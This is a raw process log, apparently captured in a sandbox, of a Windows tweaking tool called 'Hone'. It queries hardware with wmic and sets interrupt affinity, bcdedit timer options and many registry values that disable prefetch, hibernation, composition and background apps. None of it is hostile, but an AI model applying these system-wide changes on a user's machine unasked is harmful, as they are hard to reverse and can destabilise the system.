C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v AffinityTweaks /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get NumberOfCores /value

C:\Windows\system32\find.exe

find "="

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get NumberOfLogicalProcessors /value

C:\Windows\system32\find.exe

find "="

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_USBController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\sc.exe

sc config "STR" start= auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\sc.exe

sc config "STR" start=auto

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get buildnumber /value

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformtick

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:12X /n /m "  >:"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "MemoryTweaks" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\reg.exe

